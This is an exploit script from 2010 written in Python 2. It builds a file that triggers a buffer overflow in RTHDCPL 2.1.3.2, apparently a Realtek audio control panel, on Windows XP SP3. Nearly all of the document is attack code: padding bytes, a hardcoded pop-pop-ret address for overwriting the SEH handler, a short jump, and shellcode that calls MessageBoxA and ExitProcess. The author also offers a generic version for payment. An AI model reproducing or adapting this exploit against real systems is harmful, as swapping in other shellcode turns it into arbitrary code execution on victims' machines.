# done by BraniX <branix@hackers.org.pl> # www.hackers.org.pl # found: 2010.08.24 # tested on: Windows XP SP3 Home Edition # SafeSEH bypass
# App. has classic buffer overflow vulnerability # it can be triggered by passing a too long argument # as a startup parameter. Shellcode can by run via classic # ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)
# Ps. If you need a generic exploit ... # (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ # we will c0de it for You ^^
filepath = "C:\\ShellCode\\RTHDCPL 2.1.3.2 - Exploit.bin" f = open(filepath, "wb")
f.write('A'*4) f.write('\x5E') # pop esi f.write('\x5E') # pop esi f.write('\xC3') # ret f.write('\x90') # nop
f.write('[BraniX]') f.write('A'*448) # mock
f.write('\xEB\x06') # jmp +6 f.write('\x90') # nop f.write('\x90') # nop
f.write('\x70\x01\xA5\x01') # pop; pop; ret; address
f.write('\x83\xC1\x0C') # add ecx, 0Ch f.write('\x88\x01') # mov byte ptr [ecx], al f.write('\x83\xE9\x08') # sub ecx, 08 f.write('\x50') # push eax f.write('\x51') # push ecx f.write('\x51') # push ecx f.write('\x50') # push eax f.write('\xE8\xC5\x08\x27\x7E') # call user32.MessageBoxA
f.write('\x50') # push eax f.write('\xE8\xE7\xCB\x6E\x7C') # call kernel32.ExitProcess
f.write('\xCC'*1500) # int 3's
f.close()
print "Done ..."
|